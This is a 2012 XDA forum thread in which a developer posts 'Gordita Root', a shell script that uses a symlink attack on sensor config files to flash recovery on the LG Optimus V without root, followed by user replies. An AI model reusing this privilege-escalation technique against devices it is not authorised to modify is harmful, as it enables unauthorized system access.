FORUMS

PSA: You Can Optimize Your Note 4’s Recents Menu & RAM

The Note 4 never had the fastest Recents Menu, and despite its 3GB of RAM, … more

XDA Picks: Best Apps of the Week (July 25 – Aug 1)

Apps are at the front and center of any smartphone experience, and with over a … more

Voices Of XDA: Orbiting The Earth With Android

Editor’s note: This week’s feature has been written by forum … more

CloudPlayer: DIY HiFi Music Streaming Solution

In our Helpful Guide to Music Streaming Services, we mentioned several different services … more

Gordita Root: Optimus V exploit March 24th 2012

4,695 posts
Thanks Meter: 11,278
 
By jcase, Forum Moderator / Senior Recognized Developer - Taco Vendor on 24th March 2012, 08:20 AM
Post Reply Subscribe to Thread Email Thread
This is an exploit, I take NO RESPONSIBILITY if this does ANYTHING bad, your fault not mine, it was only tested on the firmware mentioned below. If you redistribute it, republish, work it into a all in one click, please link back and PROPERLY credit me.

Tested on the
ro.build.date=Mon Jan 30 10:42:53 KST 2012
ro.build.version.incremental=ZV9.479A6632

Update for the VirginMobile LG Optimus V

Your phone needs to be updated to the above build, and potentially needs a factory reset before this works, but it works fine. This will allow you to flash recovery without being root. After flashing recovery, flash this zip http://dl.dropbox.com/u/8699733/rootme.zip to install su, superuser and disable re-flashing of the stock re covery

LinuxMac Script + files:
https://github.com/CunningLogic/GorditaRoot

Flash_image:
https://github.com/CunningLogic/Gord...er/flash_image

Recovery:
http://www.mediafire.com/?vzc5k8taj9smmll (Credit BobZhome)

Windows users run the commands manually

GNU nano 2.2.2 File: Gordita.sh

Code:
#!/bin/sh
echo "GorditaRoot 1.0 by jcase / TeamAndIRC"
echo "for the VM670 Optimus V"
echo "March 21st 2012"
echo "Follow me! http://www.twitter.com/TeamAndIRC"
echo "Donations are optional http://forum.xda-developers.com/donatetome.php?u=2376614"
echo "-"
echo "Recovery taken from http://forum.xda-developers.com/showthread.php?t=1197991"
echo "-"
echo "Pushing recovery to /data/local/"
adb push VM670NH_recovery.img /data/local/recovery.img
adb push flash_image /data/local/
adb shell "chmod 755 /data/local/flash_image"
echo "Removing old sensor config, setting up symlink attack"
adb shell "rm /data/amit/*"
adb shell "ln -s /dev/mtd/mtd2 /data/amit/AMI304_Config.ini"
adb shell "ln -s /dev/mtd/mtd2 /data/amit/AMI304_Config2.ini"
echo "Rebooting to execute symlink attack, to chmod 666 the recovery block device"
adb reboot
adb wait-for-device
sleep 10
adb shell "rm /data/amit/*"
adb shell "/data/local/flash_image recovery /data/local/recovery.img"
echo "Recovery flashed! Enjoy"
Having trouble identifying whether or not you completed the root process? Quickly test for root access with Root Checker Basic
Last edited by jcase; 26th March 2012 at 03:34 AM.
The Following 17 Users Say Thank You to jcase For This Useful Post: [ View ]
 
 
24th March 2012, 08:39 AM |#2  
JerryScript's Avatar
Senior Member
Flag Las Vegas
Thanks Meter: 567
 
More
Confirmed working on a phone donated just for this purpose!

Started with stock firmware, Android 2.2.1, baseband VM670ZV4_60401001, generic android recovery

Flashed the VirginMobile Security Update from their website, became VM670ZV9_60401001 ZV9.479A6632

Manually walked through above script by jcase via gtalk, and using the exploit, was able to flash BobZhome's CWM for the VM670, reboot into it and made a backup.

Flashed the su zip, and all is well in Optimus V land again.

HUGE THANKS TO JCASE FOR TAKING THE TIME TO RE-ROOT THE VM670!!!
The Following 8 Users Say Thank You to JerryScript For This Useful Post: [ View ]
25th March 2012, 11:34 PM |#3  
wilberfan's Avatar
Senior Member
Flag So Cal
Thanks Meter: 54
 
More
I only wish I understood what it all meant--so I could be excited, too!
The Following User Says Thank You to wilberfan For This Useful Post: [ View ]
26th March 2012, 02:54 AM |#4  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 11,278
 
Donate to Me
More
Quote:
Originally Posted by wilberfan

I only wish I understood what it all meant--so I could be excited, too!

Means ppl who couldnt root before, now can
The Following User Says Thank You to jcase For This Useful Post: [ View ]
26th March 2012, 03:11 AM |#5  
b.roid's Avatar
Junior Member
Thanks Meter: 2
 
More
Quote:
Originally Posted by wilberfan

I only wish I understood what it all meant--so I could be excited, too!

i was gonna ask the same thing LOL
27th March 2012, 11:20 AM |#6  
jlear3's Avatar
Senior Member
Thanks Meter: 477
 
More
Hey! Sorry, I'm a ET4G user, just trying to put ICS on my girl's phone so she stops whining

Anyways, I presume there's an update being pushed to all optimus v's? If so would you happen to know how I could update hers? Or would it be easier to stay on the current version ( i belive v5???) and root a different way??

Also, great work on an exploit so soon after a release! Happy to join (kinda) the Optimus family!
27th March 2012, 06:48 PM |#7  
JerryScript's Avatar
Senior Member
Flag Las Vegas
Thanks Meter: 567
 
More
Quote:
Originally Posted by jlear3

Hey! Sorry, I'm a ET4G user, just trying to put ICS on my girl's phone so she stops whining

Anyways, I presume there's an update being pushed to all optimus v's? If so would you happen to know how I could update hers? Or would it be easier to stay on the current version ( i belive v5???) and root a different way??

Also, great work on an exploit so soon after a release! Happy to join (kinda) the Optimus family!

The update is not being pushed, because the OTA mechanism doesn't work on the OV. You have to go to the VM website and download the update from the phone FAQ.

The only advantage is a new radio, which give slightly improved performance.
28th March 2012, 12:17 AM |#8  
Senior Member
Thanks Meter: 32
 
More
Thank you very much!

I installed the update to my (unmodded) backup phone without thinking about whether or not I'd be able to root the handset after applying it. DOH!

I have just been using this phone as a WiFi device so far. I have run the battery down and recharged it once and installed a few apps on it. So I will run it down, recharge it again and then do a factory reset before I try rooting it just to make sure that I don't hose it.
28th March 2012, 06:58 PM |#9  
Senior Member
Thanks Meter: 32
 
More
Thumbs up It's a good idea to check all the steps before you start ...
Finally ran my battery down for the second time. So, I recharged, ran a factory re-set and ran the shell script on my Linux box to root the phone.

Oops!

The file VM670NH_recovery.img downloaded as VM670NH_recovery.bin and the system can't find/stat it! Hit ^C and bailed!

Hoping, hoping, hoping ...

Good! It's not bricked!

Renamed the recovery file, re-ran the script. Success!!

Rebooted into recovery, flashed rootme.zip

==> Did a nandroid backup.

Downloaded root check basic app and confirmed that it has worked.

So, for other modders trying this out:

Check your files and file names before you start! When I looked at Gordita.sh the first time I found that what I had downloaded was an HTML file with the script embedded in it. Copied and pasted from the OP and then checked again to make sure I had the right content.

Of course if you are running the adb commands manually then this won't happen to you.

But, as I noted above, I didn't cross-check that the recovery file that the script would be looking for had the right file name extension (.img, not .bin), so don't be me.

That said, jcase: Thank You Very Much!! Not only for developing this root exploit but also for making one that is robust enough for someone like me to goober it up and still come out unburnt!
The Following User Says Thank You to glarepate For This Useful Post: [ View ]
31st March 2012, 03:10 PM |#10  
Junior Member
Thanks Meter: 0
 
More
After all of this , can you make it a hotspot in quick settings?
1st April 2012, 08:30 PM |#11  
Senior Member
Thanks Meter: 32
 
More
The setting dialog is there ..
Quote:
Originally Posted by H0daddy

After all of this , can you make it a hotspot in quick settings?

Once I rooted my phone I installed a modified ROM. And then another one, and then ...

I saw your question a bit ago and since I no longer had the stock ROM installed (and had never used Quick Settings to enable the hotspot feature before) I didn't know. I still don't. Here is the story on that ...

I just restored the ZV9 ROM from backup today and then installed the Quick Settings app. I can say that the app still has the option to enable the hotspot available and that it tries to set it up. However the phone I am using hasn't been activated yet and the 3G network isn't provisioned on it. So all I get is a message saying the network isn't available.

So, it looks somewhat promising. Maybe someone who has an activated phone with the ZV9 ROM can test it out and let you know.

And if I activate this phone before you get a useful reply I'll test it to see if it works.

Read More
Post Reply Subscribe to Thread
Previous Thread Next Thread
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes